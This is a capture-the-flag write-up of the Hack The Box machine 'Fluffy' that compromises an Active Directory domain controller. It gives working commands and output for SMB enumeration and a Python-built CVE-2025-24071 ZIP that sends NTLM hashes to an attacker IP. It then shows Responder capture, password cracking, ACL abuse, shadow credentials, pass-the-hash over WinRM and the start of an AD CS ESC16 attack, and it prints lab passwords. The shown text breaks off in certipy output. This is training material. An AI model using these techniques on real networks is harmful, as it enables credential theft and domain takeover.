0xPwnbuff3r

Compromising a Domain Controller (HTB fluffy)

Author: Nullbyte

Fluffy is a Hack The Box machine modelled on a corporate network: the attack chain works through the fundamentals of an Active Directory environment, exploiting one misconfiguration after another, byte by byte.

Let's hack!

Credentials:

"As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!"

Recon

┌──(root㉿kali)-[/tmp]
└─# scan fluffy.htb
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.85.197:53
Open 10.129.85.197:88
Open 10.129.85.197:139
Open 10.129.85.197:389
Open 10.129.85.197:445
Open 10.129.85.197:464
Open 10.129.85.197:593
Open 10.129.85.197:636
Open 10.129.85.197:3269
Open 10.129.85.197:3268
Open 10.129.85.197:5985
Open 10.129.85.197:9389

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-30 03:02:41Z)
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49717/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=7/29%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68892942%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
OPS(O1=M552NW8NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43914/tcp): CLEAN (Timeout)
|   Check 2 (port 45400/tcp): CLEAN (Timeout)
|   Check 3 (port 29708/udp): CLEAN (Timeout)
|   Check 4 (port 37110/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-30T03:03:37
|_  start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

TRACEROUTE (using port 49690/tcp)
HOP RTT       ADDRESS
1   144.00 ms 10.10.14.1 (10.10.14.1)
2   145.84 ms fluffy.htb (10.129.85.197)

[0x0539] > Looking at the results, a few ports will clearly matter: 445 (SMB), 389/636 (LDAP/LDAPS), 88 (Kerberos) and 5985 (WinRM). The LDAPS certificate is issued by fluffy-DC01-CA, which tells us AD CS is deployed in the domain. Two details worth noting for later: SMB message signing is enabled and required, so NTLM relay to this host is not an option (any captured hash will have to be cracked), and the clock skew of about 7 hours, which will break Kerberos (PKINIT, getTGT) unless we sync our clock with the DC first. We start with SMB, used for file sharing and, depending on the user's rights, remote code execution.

  • Trick: using nxc (NetExec) to enumerate SMB shares with the credentials we were given
┌──(root㉿kali)-[/tmp]
└─# nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB         10.129.85.197   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.85.197   445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.129.85.197   445    DC01             [*] Enumerated shares
SMB         10.129.85.197   445    DC01             Share           Permissions     Remark
SMB         10.129.85.197   445    DC01             -----           -----------     ------
SMB         10.129.85.197   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.85.197   445    DC01             C$                              Default share
SMB         10.129.85.197   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.85.197   445    DC01             IT              READ,WRITE      
SMB         10.129.85.197   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.85.197   445    DC01             SYSVOL          READ            Logon server share
┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls' 
Password for [WORKGROUP\j.fleischman]:
  .                                   D        0  Tue Jul 29 23:23:33 2025
  ..                                  D        0  Tue Jul 29 23:23:33 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

        5842943 blocks of size 4096. 1844516 blocks available
┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls;get Upgrade_Notice.pdf'
Password for [WORKGROUP\j.fleischman]:
  .                                   D        0  Tue Jul 29 23:23:33 2025
  ..                                  D        0  Tue Jul 29 23:23:33 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

        5842943 blocks of size 4096. 1880881 blocks available
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (148.2 KiloBytes/sec) (average 148.2 KiloBytes/sec)

[0x0539] > Opening the PDF, we find an upgrade notice listing several vulnerabilities, one of which is still present on the network. One of them is particularly interesting: a quick search turns up a CVE, with a public PoC, that gives us a foothold.

CVE-2025-24071 is a Windows File Explorer spoofing vulnerability: when a ZIP containing a .library-ms file is extracted, Explorer parses the library description and resolves the UNC path inside it, authenticating over SMB to that host with the credentials of the user doing the extraction, no click on the file required. Since we have write access to the IT share and somebody on the box evidently opens what lands there, we plant the archive and catch the NetNTLMv2 response with Responder.

CVE-2025-24071 -> https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom
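The same trigger file the Metasploit module above produces, built by hand so the mechanism is visible, plus the check a defender would run on incoming archives. This is an added example, not code from the page or from the linked repository; the attacker address 10.10.14.184 and the share name 'shared' are assumptions taken from the module options, and the library XML follows the layout of the public PoCs for this CVE.

```python
"""Added example: build the CVE-2025-24071 trigger without Metasploit and
inspect such an archive. A .library-ms is an XML library description; when
Explorer extracts the ZIP it resolves the library's simpleLocation, and a
UNC path there makes it authenticate over SMB to that host. Attacker host
10.10.14.184 and share 'shared' are assumed values for the demo."""
import io
import zipfile
import xml.etree.ElementTree as ET

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Library description as used by the public PoCs; only <url> matters.
LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{unc}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_library_ms(attacker_ip: str, share: str = "shared") -> bytes:
    """Render the .library-ms with the attacker UNC path as its location."""
    unc = f"\\\\{attacker_ip}\\{share}"          # \\10.10.14.184\shared
    return LIBRARY_MS.format(ns=LIBRARY_NS, unc=unc).encode("utf-8")


def build_zip(attacker_ip: str, library_name: str = "malicious.library-ms",
              share: str = "shared") -> bytes:
    """Return the ZIP bytes (same layout the Metasploit module writes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(library_name, build_library_ms(attacker_ip, share))
    return buf.getvalue()


def unc_targets(zip_bytes: bytes) -> list:
    """Defensive check: every UNC <url> found in .library-ms members of a ZIP.
    Anything non-empty arriving through an upload or mail gateway is suspect."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            for url in root.iter(f"{{{LIBRARY_NS}}}url"):
                if url.text and url.text.startswith("\\\\"):
                    found.append(url.text)
    return found


if __name__ == "__main__":
    data = build_zip("10.10.14.184")
    with open("exploit.zip", "wb") as fh:
        fh.write(data)
    print("UNC targets inside exploit.zip:", unc_targets(data))
```

The share name is irrelevant to the capture: Responder answers any SMB connection and records the authentication attempt, so only the host part of the UNC path needs to point at us.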

              .7
            .'/
           / /
          / /
         / /
        / /
       / /
      / /
     / /
    / /
  __|/
,-\__\
|f-"Y\|
\()7L/
 cgD                            __ _
 |\(                          .'  Y '>,
  \ \                        / _   _   \
   \\\                       )(_) (_)(|}
    \\\                      {  4A   } /
     \\\                      \uLuJJ/\l
      \\\                     |3    p)/
       \\\___ __________      /nnm_n//
       c7___-__,__-)\,__)(".  \_>-<_/D
                  //V     \_"-._.__G G_c__.-__<"/ ( \
                         <"-._>__-,G_.___)\   \7\
                        ("-.__.| \"<.__.-" )   \ \
                        |"-.__"\  |"-.__.-".\   \ \
                        ("-.__"". \"-.__.-".|    \_\
                        \"-.__""|!|"-.__.-".)     \ \
                         "-.__""\_|"-.__.-"./      \ l
                          ".__""">G>-.__.-">       .--,_
                              ""  G

-Exploiting the Vulnerability-

[0x0539] > Generating the payload. The module is ntlm_hash_leak.rb from the repository above, loaded into Metasploit (it is not one of the standard modules). ATTACKER_IP is our tun0 address; SHARE_NAME is arbitrary, since Responder will answer whatever share the victim asks for.

msf6 auxiliary(server/ntlm_hash_leak) > options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description
   ----          ---------------       --------  -----------
   ATTACKER_IP                         yes       The IP address to which the SMB request will be sent
   FILENAME      exploit.zip           yes       The name of the ZIP file to create
   LIBRARY_NAME  malicious.library-ms  yes       The name of the .library-ms file
   SHARE_NAME    shared                yes       The SMB share name to use in the .library-ms file


View the full module info with the info, or info -d command.

msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 10.10.14.184
ATTACKER_IP => 10.10.14.184
msf6 auxiliary(server/ntlm_hash_leak) > exploit
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
msf6 auxiliary(server/ntlm_hash_leak) > pwd
[*] exec: pwd
/root/windows/ctf/fluffy/CVE-2025-24071-msfvenom

[0x0539] > Uploading the generated ZIP to the IT share, where we have READ,WRITE:

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ls
exploit.zip  ntlm_hash_leak.rb  README.md
                                                                                                         
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman'                               
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.8 kb/s) (average 0.8 kb/s)
smb: \> 

[0x0539] > Listening with Responder until p.agila's hash comes in. Responder's SMB server answers the connection to \\10.10.14.184\shared and records the NetNTLMv2 challenge/response; save that line to a file (hash_p.agila below) for john. Note the client address is the DC itself: the archive is being opened on DC01.

┌──(root㉿kali)-[/home/nullbyte]
└─# responder -I tun0 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.6.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

  [+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.85.197
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:HIDDEN

[0x0539] > Cracking p.agila's hash (john detects the netntlmv2 format from the line itself):

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_p.agila 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)     
1g 0:00:00:10 DONE (2025-07-29 17:42) 0.09354g/s 422579p/s 422579c/s 422579C/s proquis..prom pics
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

[0x0539] > Checking what p.agila can write in the directory with bloodyAD's get writable:

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
permission: WRITE

distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE

[0x0539] > p.agila holds WriteOwner and WriteDacl over the Service Accounts group. That is a full takeover of the group object: as owner we can rewrite its DACL, grant ourselves GenericAll and add ourselves as a member. Be precise about what this gives: ownership of the group controls the group object itself (its ACL and its member list), not the member accounts directly. What makes membership valuable is whatever rights the group holds over other objects, which we find out once we are inside it.

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' set owner "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila

[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb

[0x0539] > As the new owner, p.agila can rewrite the group's DACL; we grant ourselves GenericAll over Service Accounts:

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila

[+] p.agila has now GenericAll on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb

[0x0539] > With GenericAll we can add p.agila as a member of Service Accounts:

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila added to CN=Service Accounts,CN=Users,DC=fluffy,DC=htb

[0x0539] > Listing the members of Service Accounts over LDAP (authenticated bind as p.agila):

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ldapsearch -x -H ldap://10.129.85.197 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" | grep member
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb
member: CN=ldap service,CN=Users,DC=fluffy,DC=htb
member: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb

[0x0539] > Three members, all service accounts judging by their names. Two are interesting for us: winrm service (remote management, i.e. a shell over WinRM on port 5985) and certificate authority service (AD CS).


[0x0539] > Now that we are in Service Accounts, the group's own rights apply to us, and they include write access to the service accounts' objects (the pywhisker update below succeeds as p.agila). That is enough for a shadow credentials attack: we write our own public key into the target's msDS-KeyCredentialLink attribute, then use the matching private key for Kerberos PKINIT and obtain a TGT as that account, no password needed. The prerequisite is that the DC supports PKINIT, which it does here since AD CS is deployed (we already saw the fluffy-DC01-CA certificate on the LDAPS port).

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# pywhisker --dc-host 10.129.85.197 -d fluffy.htb -u p.agila -p 'prometheusx-303' \
 -t winrm_svc -a add

 [*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 27d0d9a6-ada7-3dda-2ac3-1cf08fd76e61
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Qhe8WZes.pfx
[+] PFX exportiert nach: Qhe8WZes.pfx
[i] Passwort für PFX: 4xN1LvZWPxl2VRHyampW
[+] Saved PFX (#PKCS12) certificate & key at path: Qhe8WZes.pfx
[*] Must be used with password: 4xN1LvZWPxl2VRHyampW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

[0x0539] > With the PFX in hand (winrm_svc in this case) we authenticate with it and get a shell over WinRM, which gives us user.txt.

Remember that in AD a certificate is a credential in its own right: Certipy's auth uses it for Kerberos PKINIT to obtain a TGT, then pulls the account's NT hash out of the PAC (via Kerberos user-to-user), which is how a "simple certificate" turns into pass-the-hash. The PFX pywhisker generated carries no identity inside it (hence the "No identities found" warning below), so the principal has to be supplied with -username and -domain:

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy auth -pfx Qhe8WZes.pfx -password "4xN1LvZWPxl2VRHyampW" -username 'winrm_svc' \
-dc-ip 10.129.85.197 -ns 10.129.85.197 -domain fluffy.htb -no-save

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': 

[0x0539] > Grabbing the flag. evil-winrm takes the NT hash with -H (pass-the-hash); -p is for a cleartext password.

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# evil-winrm -i 10.129.85.197 -u 'winrm_svc' -H 'hash ntlm'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/29/2025   8:00 PM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
0c169e83b26e682d HIDDEN HAHAHAHA
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> 

[0x0539] > Now the certificate authority service account (ca_svc). Its NT hash comes from the same shadow credentials sequence as above (pywhisker add, then certipy auth), run against ca_svc instead of winrm_svc. Two notes on the captures from here on: the box was re-spawned, so the DC's address changes from 10.129.85.197 to 10.129.164.91, and this read was taken after the UPN update further down, which is why userPrincipalName already shows administrator (before that change it reads ca_svc@fluffy.htb, the value we restore at the end). The SPN ADCS/ca.fluffy.htb confirms what this account is for.

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-08-01T21:53:02+00:00

[0x0539] > Requesting a TGT for ca_svc with impacket's getTGT, so the next Certipy commands can use Kerberos (-k) against any service. Kerberos refuses requests when the clock skew exceeds five minutes; with the +7h offset seen during recon, sync your clock with the DC first (e.g. ntpdate against the DC).

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# python3 /root/windows/python3-impacket/examples/getTGT.py fluffy.htb/ca_svc \
-hashes 'hash ntlm'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ca_svc.ccache

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# export KRB5CCNAME=ca_svc.ccache 
                                                                                                         
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# klist
Ticket cache: FILE:ca_svc.ccache
Default principal: ca_svc@FLUFFY.HTB

Valid starting       Expires              Service principal
07/30/2025 01:49:13  07/30/2025 11:49:13  krbtgt/FLUFFY.HTB@FLUFFY.HTB
    renew until 07/31/2025 01:49:12

[0x0539] > Now that we hold ca_svc we look at AD CS. certipy find flags the CA as ESC16: the security extension 1.3.6.1.4.1.311.25.2 (szOID_NTDS_CA_SECURITY_EXT, the SID extension introduced with KB5014754) is on the CA's disabled-extensions list, so no certificate it issues carries the requesting account's SID. The KDC then has to map a certificate to an account by the UPN in its SAN alone. Combined with write access to some account's userPrincipalName (we have it over ca_svc through the Service Accounts membership), that is an impersonation primitive: set ca_svc's UPN to administrator, enrol as ca_svc in a template that puts the account's UPN in the SAN (the built-in User template; ca_svc is able to enrol on this CA, whose enrol right is granted to Cert Publishers), and the CA hands back a certificate whose SAN says administrator with no SID to contradict it. Restore the UPN, authenticate with the certificate, and the KDC maps it to the real Administrator. The attack chain follows; for a detailed explanation:

https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6

┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy find -username 'ca_svc' -k -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb

Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
